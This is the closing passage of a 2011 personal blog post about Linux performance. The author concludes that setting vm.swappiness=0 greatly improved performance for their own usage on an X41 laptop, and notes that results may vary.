Conclusion: For the usage pattern I'm accustomed to, setting vm.swappiness=0 actually is a huge performance improvement. But your mileage may vary.

posted 2011-01-05 ∴ tagged x41, linux and performance

Julius Plenz – Blog